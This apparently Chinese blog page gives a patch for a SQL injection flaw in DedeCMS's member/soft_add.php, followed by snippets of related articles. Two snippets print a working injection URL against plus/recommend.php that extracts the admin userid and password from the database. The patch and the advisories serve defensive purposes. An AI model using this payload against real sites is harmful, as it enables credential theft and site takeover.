dedecms织梦soft_add.php文件暴模版SQL注入漏洞修复方案

阿里云总是报dedecms的soft_add.php文件存在SQL注入漏洞,不修复觉着烦,所以就尝试修复,这里给出修复该漏洞的方法,希望能够帮助到也有此疑惑的同学们!

涉及文件及其路径

文件:soft_add.php

文件路径:/member/soft_add.php

修复方法

找到下面这句:(第154行)

 代码如下 复制代码

$urls .= “{dede:link islocal=’1′ text='{$servermsg1}’} $softurl1 {/dede:link}\r\n”;

替换成:

 if (preg_match(“#}(.*?){/dede:link}{dede:#sim”, $servermsg1) != 1) { $urls .= “{dede:link islocal=’1′ text='{$servermsg1}’} $softurl1 {/dede:link}\r\n”; }

保存再检测就发现漏洞已经修复了。请大家注意备份文件,在修改过的地方做好批注

时间: 2024-07-31 04:29:40

dedecms织梦soft_add.php文件暴模版SQL注入漏洞修复方案的相关文章

dedecms(织梦)请求流程

问题描述 dedecms(织梦)请求流程 有个问题,dedecms的请求流程是怎样的?是直接请求的html静态页面吗?有经过控制器解析吗?就是,我给某个dedecms链接带个参数,然后在dedecms中获取到并存到session中,有这样的做法吗?有的话,是在那个.class.php文件中实现的?谢谢

dedecms织梦建站简单步骤

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 1.www.dedecms.com官网下载dedecms织梦内容管理系统, 同时配合wampserver服务器软件使用建站模块. 2.把下载好的dedecms的织梦后台管理系统压缩包解压到wapserver所在安装的位置www文件夹下, 例如安装所在位置于d盘D:wampwww,则解压所下载的后台管理系统在此位置下. 3.输入网址http:/

Dedecms织梦程序漏洞层出不穷 解决根本问题是关键

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 众所周之,织梦的开源程序在企业站或门户站中占有很大地位,其以自身强大功能及上手快,操作易的特点, 使得不少初学者纷纷选择此程序来搭建自己的网站站点.然而,正是因为如此多的的人使用此程序,也使得不少黑客利用其程序本身漏洞,入侵站长网站,挂黑链,发布病毒,种植木马,令广大织梦站长们苦不堪言,小编的垃圾车网站也曾经深受其害.那么,小编是怎样解决问题

修改dedecms 织梦系统 生成静态页面栏目缓存文件路径

修改dedecms 织梦系统 生成静态页面栏目缓存文件路径 由于dedecms 生成频道栏目,要生成一个临时mkall_cache_{adminid}.php教程文件,这对网站做安全会有一定的影响,特别我现在是把我整个网站限制不能上传php,js文件,为了方便起见,今天我就来拿我修改过程记录下来与各位分享吧. 首页我们找到dedecms  的后台管理上当默认是在dede/目录. 找到文件: makehtml_all.php 找到73行, 将 //$mkcachefile = DEDEROOT."

DedeCMS曝SQL注入漏洞 360提醒站长速打补丁

中介交易 SEO诊断 淘宝客 云主机 技术大厅 近日,知名第三方漏洞报告平台乌云曝光建站工具DedeCMS系统反馈页面存在SQL注入高危漏洞(http://www.wooyun.org/bugs/wooyun-2012-014076 ),攻击者可以轻易获取网站管理员密码, 网站数据面临"拖库"威胁.经360网站安全检测(WebScan)对注册用户的分析研究发现,86%使用DedeCMS的网站存在该漏洞,危害范围十分广泛. 360网站安全检测服务网址:http://webscan.360

最新DedeCMS通杀SQL注入漏洞利用代码整理

      dedecms即织梦(PHP开源网站内容管理系统).织梦内容管理系统(DedeCms) 以简单.实用.开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:  代码如下 复制代码 /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`

DedeCMS通杀SQL注入漏洞利用代码及工具介绍

近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下: EXP: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'   or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select  CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,

Dedecms织梦栏目分页标题优化与增加页码

如何做织梦dedecms标题栏目优化代码,使dede模版栏目达到标准优化 一种.大多数站长都很喜欢用dedecms来建站吧,在建站过程中可能也遇到过这样的问题,废话就不多说了,进入主题,修改前请做好备份! 第一.栏目url标准化 当我用dedecms建了分类了时候,发现在栏目是带index.html的 修改前:/abc/index.html 修改后:/abc/ 打开文件:include/channelunit.func.php 大概在171行 $reurl = $typedir.'/'.$def

DedeCms织梦后台添加编辑文章空白解决办法

原因分析: 根据dedecms官方文档说明,出现这种问题是可能是由于catalog_do.php里的header()的问题,因为当执行header()前,如果前面输出了空格.空行.任何字符,都会导致header()跳转失效.这就需要你非常有耐心的去排查一个个<?php  ?>是否有空格或空行.把这些空格空行删除,至此功能就全部正常了. 解决的方法: 1.下载-/dede/catalog_do.php把文件下载到本地,用文本编辑器打开,做如下替换: A.把:header("locati